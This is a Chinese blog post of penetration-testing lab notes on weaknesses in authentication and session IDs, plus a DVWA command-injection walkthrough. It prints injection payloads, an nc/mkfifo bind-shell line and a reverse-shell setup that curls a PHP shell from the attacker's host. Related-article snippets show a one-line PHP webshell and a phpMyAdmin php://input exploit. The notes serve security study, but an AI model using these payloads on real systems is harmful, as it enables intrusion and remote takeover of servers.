【渗透测试笔记】之【手动漏洞挖掘二】

最新推荐文章于 2023-12-21 16:09:55 发布
最新推荐文章于 2023-12-21 16:09:55 发布
阅读量333 收藏 1
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/107226208
版权

身份认证

  • 常用弱口令/基于字典的密码爆破
    一个好的Web,当离错误密码错误过多后会锁定账号。
  • 信息收集
    手机号、密码错误提示信息
    做得好的它会显示用户名或密码错误
    做得不好的它会提示用户不存在
    (另外还有在返回代码中的提示,如errorcode,不会在页面提示)
    此时就可以根据收集的信息进行暴力破解
  • 密码嗅探(同一网段,流量抓包)

会话sessionID

  • Xss/cookie import
  • SessionID in URL
    一些不好的Web会将SessionID写入URL里
  • 嗅探
    同网段流量抓包
  • SessionID 长期不变/永久不变
  • SessionID 生成算法
    Sequencer(判断SessionID安全性)
    私有算法(自己发明的的Session生成算法可能会不安全)
    预判下一次登录时生成的SessionID
    注销后返回测试(即测试注销后SessionID还是否有效)
  • 密码找回
    有些密码找回发送给你邮箱的找回密码连接后面的密文有规律
    128 MD5
    160 SHA1
    256 SHA256

漏洞挖掘(拥有登录权限后)

  • 手动爬网自动爬网
  • 漏洞挖掘原则
    所有变量
    所有头:Cookie中的变量等
    逐个变量删除
  • 系统命令执行漏洞
    DVWA Command Execution
;ls
&ls  # 同时执行
127.0.0.1&&ls  # 前面执行成功执行后面
| ls  # 先执行前再执行后
|| ls  # 前面失败执行后面

利用命令打开端口

;mkfifo /tmp/pipe;sh /tmp/pip/pipe | nc -nlp 4444 > /tmp/pipe

kali连接端口

nc 192.168.2.101 4444
  • 错误的反弹shell示范(自己弹自己的shell)
    原理在于反弹shell在哪台主机,就会反弹谁的shell
    错误示范:

启动Apache服务

service apache2 start

将反弹shell移动到目录下命名为1.php

cp /usr/share/webshells/php/php-reverse-shell.php /var/www/html/1.php

编辑反弹Shell IP及端口
在这里插入图片描述
本机开始侦听1234端口

nc -nvvlp 1234

目标触发反弹Shell

;curl http://192.168.2.106/1.php

在这里插入图片描述
本机捕获Shell
在这里插入图片描述

AA8j
关注
专栏目录
漏洞挖掘】——141、 逻辑漏洞之身份验证汇总
Fly_鹏程万里
07-26 122
身份验证是网站必不可少的一项业务功能设计,而身份验证机制的选择和设计也会带来诸多的安全问题,在本篇文章中我们将介绍网站使用的身份验证机制以及这些验证机制中存在的安全漏洞并对一些安全防护机制和设计中存在的缺陷和绕过方式进行简易的刨析和演示,同时会对不同身份验证机制中存在的固有安全漏洞进行分析,最后我们会介绍如何使身份验证机制尽可能安全的方法。
渗透测试实战指南笔记
weixin_67830340的博客
04-07 2016
章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程序中会有5个选项,如下
手动漏洞挖掘-SQL注入小谈(
含笑
05-20 1224
然后用burp抓包,历史转发Repeater, 测试一下,如果正常的话,就在Intruder里把要修改的参数设置为变量; 然后倒入字典; Payload Encoding 可以去掉; 可以看到正确执行; 猜解列名; 老样子,设置变量; 使用字典文件试一下啊root@R:~# find / -name *table*.txt root@R:~# ls colu
XSS漏洞挖掘笔记
守拙的博客
05-30 623
一些 XSS 漏洞挖掘的知识点和技巧
业务漏洞挖掘笔记
hackzkaq的博客
03-04 525
更多黑客技能 公众号:小道黑客 业务漏洞挖掘笔记 多年的实战业务漏洞挖掘经验,为了让今后的业务漏洞挖掘工作更清晰,以及尽可能的把重复性的工作自动化、半自动化,所以花费很大精力做了这个笔记。 具体操作流程: 得到测试目标-目标资产范围确定-资产收集-资产管理-资产分类-具体业务功能理解-业务漏洞测试-逻辑漏洞测试-提交报告 资产管理 很多文章和大佬都讲过,渗透测试的本质就是信息收集,收集到的信息越多,发现漏洞的概率越大,这些信息被称为资产。 那么常规的资产收集手段,思路已经千篇一律了,围绕着子域名和IP收
渗透测试笔记】之【手动漏洞挖掘四】
AA8j的博客
07-11 228
文件上传漏洞 上传一句话木马 <?php echo shell_exec($_GET['cmd']);?> 访问该文件,并在末尾加上 ?cmd=id
APP漏洞挖掘学习笔记
weixin_33711641的博客
03-04 198
App漏洞挖掘总结 Ex1->任意用户登录 数据包根据ID区别用户,可直接通过抓包获得用户ID,登录时通过修改ID从而登录到不同的账户 wooyun-2016-0215015--映客APP任意用户登录(附成功登录用户) wooyun-2016-0210287 --APP安全之百合网核心客户端未授权任意登录(吴莫愁为例) wooyun-2016-0207456--鱼泡泡...
渗透测试学习笔记
Tom197的博客
06-08 1469
2.子域名查询 3.NDS2IP 查询IP,可以通过ping域名方式获得。 站长之家也可以获得,得到IP更详细,通过不同服务器访问,得到大致位置。 nslookup 域名 dig 域名 dnsenum 域名 4.nmap测试 测试服务器所在局域网情况(服务器有哪些设备,开放了什么端口端口),防止一台服务器被攻陷,再延续到局域网其他服务器,nmap -sp 地址。 nmap -O 查询这一网络中每一台设备是什么系统 。AWVS ——new scan 输入网站地址,得到所有漏洞的信息,点击相应漏洞,右侧出
CTF内网渗透笔记
qq_26579613的博客
11-10 3990
一、漏洞挖掘相关工具的使用 NMAP扫描工具使用 1.扫描指定的IP范围 nmap 192.168.0.101-110 2.扫描指定的IP网段 nmap 192.168.0.* --exclude 192.168.0.100 3.扫描指定网址的操作系统类型(深度扫描) nmap -A 192.168.0.101 or nmap -O 192.168.0.101 4.扫描网络内活跃的主机(该命令会跳过端口扫描或检测) nmap -sP 192.168.0.* 5.快速扫描主
Kali linux 学习笔记(四十六)Web渗透——漏洞挖掘之身份认证 2020.3.23
闵行小鱼塘
03-23 507
本节学习挖掘身份认证的漏洞
小白日记35:kali渗透测试之Web渗透-手动漏洞挖掘(一)-默认安装引发的漏洞
ZiXuanFY的博客
10-21 5521
手动漏洞挖掘 即扫描后,如何对发现的漏洞告警进行验证。 #默认安装 流传linux操作系统比windows系统安全的说法,是因为windows系统默认安装后,会开放很多服务和无用的端口,而且未经过严格安全性的配置,经常有系统服务以最高权限运行。 漏洞类型--远程命令执行 1、phpMyadmin 安装在web服务器中的web接口,专门用来管理MySQL数
IOT漏洞挖掘学习笔记(一)——堆基础及相关数据结构
weixin_43137410的博客
08-19 1601
1.CTF介绍 线上赛: 答题模式 线下赛: AWD(攻防模式) RealWorld(展示模式) 主要考查漏洞挖掘与利用能力 进制安全: 栈溢出 栈溢出的防护绕过 堆溢出 堆溢出漏洞 格式化字符串 IOFILE RACE 命令注入 REAL WORLD: IOT漏洞挖掘 浏览器漏洞挖掘 虚拟机逃逸 js解析器 前置知识: 掌握任何一门编程语言 工具使用能力 2.堆溢出 在malloc(分配动态内存) fr
2.手动挖掘漏洞,详细解说,明实验和使用
qq_41860876的博客
09-16 797
任务086:手动漏洞挖掘) 这个是我的看的教程的笔记。 里面是我自己实验的照片。 挖掘漏洞原则 挖掘漏洞原则是非常非常重要的 1.1.所有的变量 所有的变量都要去尝试,用各种各样的注入攻击手段尝试每一个变量每一个可以提交的数据的位置都要去尝试提交注入 1.2.所有的头 还要关住HTTP的头也是可以注入信息也可以完成相应的注入应为头也可以判断一个条件 重定要关注cookie(苦k) 1.3....
1.手动挖掘漏洞,详细解说,明实验和使用 (身份验证)
qq_41860876的博客
09-14 909
任务086:手动漏洞挖掘) 这个是我的看的教程的笔记 身份认证 1.常用弱口令/基于字典密码爆破 2.账号锁定 3.信息收集 手机号 密码错误提示 4.密码嗅探 常用弱口令/基于字典密码爆破 就是像网站登陆账号密码了列账号admin密码123456 账号锁定就是连续密码错误就不在登陆了 信息收集1.手机号像出来的账号里手机号什么什么的排名像18272xxxx15就号找到这个账号2.密码错误...
《Web黑客技术揭密》第六章-漏洞挖掘笔记-结合白帽子讲web安全
lynnez_dd的博客
02-20 413
CSRF漏洞挖掘需要确认以下信息: 目标表单是否有有效的token随机串 目标表单是否有验证码 目标是否判断了Referer来源 根目录下 crossdoman.xml的 allow-access-from domain 是否是通配符 目标JSON是否可以自定义callback等 界面劫持漏洞挖掘需要确认以下信息: 目标HTTP响应头是否设置了X-Frame-...
手动渗透测试漏洞
weixin_34082789的博客
09-18 313
1. 实验环境的叙述性说明   做实验的攻击,以前我已经介绍了一篇文章Kioptrix安装和网络无人驾驶飞机配置。现在看一下虚拟机所需的两个系统:Kioptrix虚拟机和Kali Linux虚拟机。前者为靶机,后者作为攻击机使用。网络拓扑例如以下图所看到的:    2. 列举服务   首先我们使用nmap命令对网络中的机器进行扫描。输入下面命令对192.168.50.0...
漏洞挖掘渗透测试的区别
最新发布
白帽子佳奇的博客
12-21 1004
漏洞挖掘渗透测试是网络安全领域的两个重要活动,它们虽然在目标上有所重叠,但在方法、目的和范围等方面存在明显差异。
渗透测试手动漏洞利用
热门推荐
Jeanphorn的专栏
06-11 1万+
1. 实验环境描述  为了做漏洞利用的实验,前一片文章我已经介绍了Kioptrix靶机的安装和网络的配置。现在看一下虚拟机里必要的两个系统:Kioptrix虚拟机和Kali Linux虚拟机。前者为靶机,后者作为攻击机使用。网络拓扑如下图所示:   2. 列举服务  首先我们使用nmap命令对网络中的机器进行扫描,输入以下命令对192.168.50.0/24网段上所有的IP和TCP端口进行扫描。
渗透测试笔记】之【手动漏洞挖掘一】
AA8j的博客
07-08 803
WIndows默认安装漏洞 利用php配置漏洞,执行php代码进而执行系统命令 (可利用Burpsuite发送POST) POST http://192.168.2.100/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 Host: 192.168.2.100 <?php passthru('id'); die(); ?> ...
BackTrack渗透测试学习笔记概述
"这是一份关于BackTrack渗透测试的学习笔记,由作者IceSn0w编写,旨在分享其在BackTrack使用过程中的经验和技巧。笔记涵盖了Metasploit渗透测试指南、信息收集、身份识别、社会工程学攻击、Metasploit运用层攻击、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值